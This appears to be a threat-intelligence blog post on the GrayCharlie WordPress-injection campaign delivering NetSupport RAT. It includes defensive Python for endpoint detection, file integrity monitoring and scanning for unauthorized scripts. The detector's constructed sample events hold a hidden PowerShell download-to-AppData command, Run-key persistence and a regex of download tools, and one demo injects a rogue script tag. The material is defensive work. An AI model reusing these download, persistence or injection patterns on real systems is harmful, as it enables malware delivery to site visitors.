GrayCharlie Injects Malicious JavaScript to Deliver NetSupport RAT

Website compromise is no longer just about defacement or SEO spam. A threat actor known as GrayCharlie has been silently hijacking legitimate WordPress websites since mid-2023 — weaponizing them to distribute NetSupport RAT, Stealc, and SectopRAT malware.

Instead of attacking victims directly, GrayCharlie injects malicious JavaScript into trusted WordPress sites, turning them into malware delivery platforms. The result? Drive-by infections affecting law firms, enterprises, and users worldwide — with the United States as the primary target.

For CISOs, SOC analysts, DevOps teams, and IT managers, this campaign highlights a growing risk:

Your website can become someone else’s malware distribution network.

In this deep-dive analysis, we examine:

  • How GrayCharlie compromises WordPress sites
  • The full infection chain delivering NetSupport RAT
  • Infrastructure patterns and supply-chain risks
  • Detection and mitigation strategies aligned with modern threat detection frameworks

Who Is GrayCharlie?

GrayCharlie is a financially motivated threat actor overlapping with the previously tracked SmartApeSG cluster (also known as ZPHP or HANEMONEY).

Key Characteristics

  • Active since mid-2023
  • Targets WordPress-powered websites
  • Primary malware: NetSupport RAT
  • Secondary payloads: Stealc (credential stealer), SectopRAT
  • Heavy targeting of U.S. organizations
  • Suspected Russian-speaking operators

Infrastructure analysis links backend systems primarily to:

  • MivoCloud
  • HZ Hosting Ltd

Researchers identified two main C2 clusters distinguished by:

  • TLS certificate naming patterns
  • License keys and serial numbers
  • Distinct infrastructure deployment timelines throughout 2025

Primary Malware: NetSupport RAT

Originally a legitimate remote administration tool, NetSupport Manager has long been abused by threat actors.

When deployed maliciously, NetSupport RAT allows attackers to:

  • Execute remote commands
  • Capture screens
  • Transfer files
  • Conduct system reconnaissance
  • Deploy additional payloads

GrayCharlie extends this with:

  • Stealc → Credential theft from browsers and crypto wallets
  • SectopRAT → Expanded remote administration capabilities

This modular approach increases operational flexibility and long-term persistence.


How GrayCharlie Compromises WordPress Sites

The group’s core technique is malicious JavaScript injection into legitimate WordPress websites.

Step 1: DOM Injection

Attackers insert a <script> tag into the site’s Document Object Model (DOM).

The script:

  • Points to attacker-controlled infrastructure
  • Loads external JavaScript dynamically
  • Executes silently when visitors open the page

This avoids obvious visual changes to the site.


Step 2: Victim Profiling

The injected JavaScript:

  • Profiles browser type
  • Detects operating system
  • Evaluates environment suitability

Based on profiling, the victim is served one of two social engineering lures:

  1. Fake Browser Update
  2. ClickFix-style Fake CAPTCHA

Both techniques rely on user execution, bypassing many automated defenses.


Infection Chain 1: Fake Browser Update

When a victim interacts with the fake update:

  1. JavaScript executes via WScript
  2. WScript spawns PowerShell
  3. PowerShell downloads and extracts NetSupport RAT
  4. Files are written to: %AppData%
  5. Persistence mechanisms are established

This chain leverages legitimate Windows scripting tools, blending malicious activity with normal administrative behavior.


Infection Chain 2: ClickFix Fake CAPTCHA

The ClickFix variant is even more deceptive:

  1. User copies and pastes attacker-provided command
  2. Command retrieves malicious batch file
  3. NetSupport RAT is installed
  4. Registry Run key added for persistence

This is a classic example of:

Social engineering combined with Living-off-the-Land (LotL) techniques


Command-and-Control Infrastructure

GrayCharlie maintains stealthy communications:

  • C2 over TCP port 443
  • SSH management of staging servers
  • TLS certificates mimicking legitimate naming patterns

Because traffic uses standard HTTPS ports, it blends with normal encrypted traffic — complicating network-level detection.

Two distinct C2 clusters were identified, indicating operational segmentation and redundancy.


Supply Chain Angle: Law Firm Compromise

One of the most concerning findings involves U.S. law firms.

At least 15 law firm websites were injected with identical malicious JavaScript pointing to the same attacker domain.

Researchers believe the compromise may have originated via a supply-chain attack involving SMB Team, an IT services provider serving multiple law firms.

Stolen credentials linked to an SMB Team email account surfaced around the time the malicious infrastructure was activated.

This suggests:

A single third-party compromise can cascade across dozens of client websites.


Industries Impacted

While attacks span multiple sectors globally, high-impact targets include:

  • Law firms
  • Professional services
  • Small and mid-sized enterprises
  • Organizations relying heavily on WordPress

The United States remains the most frequent target region.


Technical Indicators & Detection Opportunities

Security teams should monitor for:

WordPress-Level Indicators

  • Unauthorized <script> tags injected into page templates
  • Unknown external JavaScript domains
  • File integrity changes in theme or plugin directories
  • Unexpected admin logins

Endpoint-Level Indicators

  • WScript spawning PowerShell
  • PowerShell downloading external content
  • NetSupport client installation in AppData
  • Registry Run key persistence
  • Execution of Stealc or SectopRAT payloads
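The endpoint-level indicators above can be turned into simple detection logic. The following is an added example (not tooling from the report or from any vendor) that runs those checks over a handful of constructed process-creation and registry events modelled loosely on Sysmon telemetry. The IP address, user name, file paths and the Run key name are constructed; the assumption that NetSupport Manager's client binary is named client32.exe is a common observation, not something stated on this page, so treat it as a tunable.

```python
"""Detection logic for the endpoint-level indicators listed above.
Added example with constructed sample events; not real campaign telemetry."""
import re

# Constructed sample events (Sysmon-like: process create and registry value set).
# 198.51.100.7 is a documentation-range address, user/paths are made up.
SAMPLE_EVENTS = [
    {"type": "process",
     "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c Invoke-WebRequest http://198.51.100.7/u.zip -OutFile $env:APPDATA\u.zip"},
    {"type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\AppData\Roaming\Upd\client32.exe",   # assumed NetSupport client name
     "cmdline": "client32.exe"},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Upd",
     "value": r"C:\Users\alice\AppData\Roaming\Upd\client32.exe"},
    {"type": "process",   # benign control event, should not fire
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Command-line fragments that indicate PowerShell fetching remote content.
DOWNLOAD_PATTERN = re.compile(
    r"invoke-webrequest|iwr\s|downloadstring|downloadfile|net\.webclient|start-bitstransfer|curl\s|wget\s")


def detect(events):
    """Return (event_index, technique_label, description) for every matching rule."""
    findings = []
    for i, ev in enumerate(events):
        if ev["type"] == "process":
            parent = ev["parent"].lower()
            image = ev["image"].lower()
            cmd = ev["cmdline"].lower()
            # Rule 1: Windows Script Host spawning PowerShell (fake-update chain).
            if parent.endswith(("wscript.exe", "cscript.exe")) and image.endswith("powershell.exe"):
                findings.append((i, "T1059", "WScript/CScript spawned PowerShell"))
            # Rule 2: PowerShell downloading external content.
            if image.endswith("powershell.exe") and DOWNLOAD_PATTERN.search(cmd):
                findings.append((i, "T1059", "PowerShell downloading external content"))
            # Rule 3: NetSupport client executing from a user's AppData directory.
            if "\\appdata\\" in image and image.endswith("client32.exe"):
                findings.append((i, "NetSupport", "NetSupport client executed from AppData"))
        elif ev["type"] == "registry":
            # Rule 4: Run key persistence pointing at a binary under AppData.
            if "\\currentversion\\run" in ev["key"].lower() and "\\appdata\\" in ev["value"].lower():
                findings.append((i, "T1547", "Run key persistence into AppData"))
    return findings


if __name__ == "__main__":
    for idx, technique, desc in detect(SAMPLE_EVENTS):
        print(f"event {idx}: [{technique}] {desc}")
```

The rules are deliberately narrow (parent/child image names, a download keyword, a Run key that points into AppData) so they can be ported almost line-for-line into Sigma or an EDR query; in a real deployment the client32.exe name and the download keyword list are the two places that need tuning, and the benign notepad event is there to confirm the rules do not fire on ordinary activity.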

MITRE ATT&CK Mapping

GrayCharlie techniques align with:

  • T1059 – Command and Scripting Interpreter
  • T1218 – Signed Binary Proxy Execution
  • T1547 – Boot or Logon Autostart Execution
  • T1195 – Supply Chain Compromise
  • T1027 – Obfuscated/Encoded Files

Mapping these behaviors improves detection engineering within SIEM and EDR platforms.


Why This Campaign Is Dangerous

  1. Trusted website abuse lowers user suspicion
  2. No phishing email required
  3. Browser profiling increases infection success rate
  4. Use of legitimate tools evades detection
  5. Supply-chain exposure amplifies impact

This campaign highlights the convergence of:

  • Web application compromise
  • Endpoint malware deployment
  • Infrastructure-level operational discipline

Mitigation and Defense Strategy

1. Secure WordPress Infrastructure

  • Enable file integrity monitoring
  • Use Web Application Firewalls (WAF)
  • Disable unused plugins and themes
  • Restrict admin access via IP allowlisting
  • Enforce MFA for all admin accounts
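File integrity monitoring is the control that catches the template edits this campaign relies on, because an injected <script> tag changes the hash of the theme file it lands in. The block below is an added example (not part of the report or of WordPress itself) that baselines the theme and plugin directories, then re-scans and reports added, removed and modified files. The directory layout under wp-content is the standard WordPress one; the temporary site tree, file contents and the example.invalid script host are constructed for the demo.

```python
"""Hash-based file integrity monitoring for WordPress theme/plugin directories.
Added example; builds a constructed site tree so it runs offline."""
import hashlib
import json
import tempfile
from pathlib import Path

# Standard WordPress locations for themes and plugins (assumed layout).
WATCHED = ("wp-content/themes", "wp-content/plugins")


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large plugin bundles do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path) -> dict:
    """Map each file under the watched directories (relative POSIX path) to its hash."""
    result = {}
    for sub in WATCHED:
        base = root / sub
        if not base.is_dir():
            continue
        for p in sorted(base.rglob("*")):
            if p.is_file():
                result[p.relative_to(root).as_posix()] = sha256_file(p)
    return result


def diff(baseline: dict, current: dict) -> dict:
    """Compare two snapshots and classify every difference."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }


def demo() -> dict:
    """Create a constructed site, baseline it, simulate a template injection and a dropped file."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        theme = root / "wp-content/themes/mytheme"
        theme.mkdir(parents=True)
        (theme / "header.php").write_text("<?php wp_head(); ?>\n")
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n")

        # Baseline taken from a known-clean deployment and stored outside the watched dirs.
        baseline_path = root / "baseline.json"
        baseline_path.write_text(json.dumps(snapshot(root)))

        # Simulated compromise: a script tag appended to a template and a new file dropped.
        with (theme / "header.php").open("a") as f:
            f.write('<script src="https://example.invalid/x.js"></script>\n')   # constructed
        (theme / "wp-cache.php").write_text("<?php // dropped file\n")

        return diff(json.loads(baseline_path.read_text()), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Two operational points: the baseline must be taken from a known-clean build (a fresh deploy from version control, not the live server), and it must be stored somewhere the web server's user cannot write, otherwise an attacker with template write access can simply re-baseline after injecting.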

2. Monitor for DOM Injection

  • Scan WordPress pages for unauthorized external scripts
  • Implement CSP (Content Security Policy)
  • Regularly audit JavaScript dependencies
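The WordPress-level indicators in the detection section and the DOM-injection controls above both come down to the same question: which hosts is each page loading scripts from, and are they all expected? The following added example (not from the report, the researchers, or WordPress) parses rendered HTML, lists every script source, flags those whose host is not on an allowlist, and derives the script-src directive a Content Security Policy would need to enforce that same allowlist. The page host, the allowlisted hosts and the sample HTML, including the cdn-update.invalid script that plays the injected one, are constructed.

```python
"""Scan rendered WordPress HTML for unauthorized external <script> sources and
derive a matching CSP script-src directive. Added example with constructed input."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed first-party host and the third-party script hosts the site legitimately uses.
PAGE_HOST = "www.example-firm.com"
ALLOWED_HOSTS = {PAGE_HOST, "cdnjs.cloudflare.com"}

# Constructed rendered page: one relative script, one allowlisted CDN script,
# one inline block and one injected external script (.invalid TLD, never resolves).
SAMPLE_HTML = """<!doctype html><html><head><title>Firm</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.17.21/lodash.min.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body><p>Welcome</p>
<script src="https://cdn-update.invalid/load.js" async></script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collect src attributes of <script> tags and count inline script blocks."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self.inline += 1


def script_hosts(html: str, page_host: str):
    """Return [(src, host)] for every external script; relative URLs resolve to the page host."""
    p = ScriptCollector()
    p.feed(html)
    found = []
    for src in p.srcs:
        host = urlparse(src).netloc.lower() or page_host   # handles //host/x.js and /path/x.js
        found.append((src, host))
    return found, p.inline


def unauthorized_scripts(html: str, page_host: str = PAGE_HOST, allowed=ALLOWED_HOSTS):
    """Script sources whose host is neither the page itself nor on the allowlist."""
    found, _ = script_hosts(html, page_host)
    return [src for src, host in found if host != page_host and host not in allowed]


def csp_script_src(allowed=ALLOWED_HOSTS) -> str:
    """Build the CSP script-src directive that permits exactly the allowlisted hosts."""
    return "script-src 'self' " + " ".join(sorted(f"https://{h}" for h in allowed if h != PAGE_HOST)) + ";"


if __name__ == "__main__":
    print("unauthorized:", unauthorized_scripts(SAMPLE_HTML))
    print("Content-Security-Policy:", csp_script_src())
```

Run the scanner against rendered output (fetched through the front end), not against theme files alone, since plugins and database-stored content can also emit script tags. The CSP caveat worth remembering is that an attacker who can edit templates may be able to edit headers set by PHP as well; a policy set at the web server or CDN edge, outside the WordPress file tree, is the more durable place for it, and the 'unsafe-inline' keyword should stay out of script-src or the injected inline variant of this attack passes straight through.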

3. Endpoint Hardening

  • Block WScript where unnecessary
  • Restrict PowerShell execution
  • Deploy EDR with behavioral analytics
  • Monitor registry Run keys

4. Threat Intelligence Integration

  • Block known GrayCharlie IPs and domains
  • Deploy YARA, Snort, and Sigma rules
  • Feed IOCs into SIEM platforms

5. Supply Chain Risk Management

  • Audit third-party IT vendors
  • Enforce credential hygiene
  • Monitor for leaked credentials
  • Implement zero trust vendor access controls

Common Mistakes Organizations Make

  • Assuming WordPress is secure by default
  • Failing to monitor DOM-level changes
  • Allowing unrestricted scripting tools
  • Ignoring third-party IT provider risks
  • Relying only on signature-based AV

FAQs

1. What is GrayCharlie?

GrayCharlie is a threat actor group compromising WordPress sites to distribute NetSupport RAT, Stealc, and SectopRAT malware.

2. How does the infection begin?

Through malicious JavaScript injected into legitimate WordPress websites, which serves fake updates or CAPTCHA lures.

3. What is NetSupport RAT?

A legitimate remote administration tool abused by attackers to gain remote control over infected systems.

4. Why are law firms targeted?

Law firms store sensitive client and litigation data, making them valuable espionage and financial targets.

5. How can organizations detect DOM injection?

Through file integrity monitoring, CSP enforcement, JavaScript auditing, and anomaly detection in web traffic.


Key Takeaways

  • GrayCharlie weaponizes legitimate WordPress websites.
  • NetSupport RAT remains the primary payload.
  • Stealc and SectopRAT expand credential theft and control.
  • Supply-chain compromise increases impact radius.
  • Proactive web and endpoint monitoring is essential.

Conclusion

The GrayCharlie campaign demonstrates how modern threat actors blend web compromise, social engineering, and remote access malware into scalable operations.

Organizations must recognize that:

Website security is endpoint security.

A compromised WordPress site can silently infect thousands of visitors — turning brand trust into an attack vector.

Now is the time to:

  • Audit WordPress infrastructure
  • Deploy behavioral endpoint detection
  • Enforce supply-chain security standards
  • Integrate dynamic threat intelligence

Preventing drive-by malware distribution requires vigilance at every layer — from web server to endpoint.
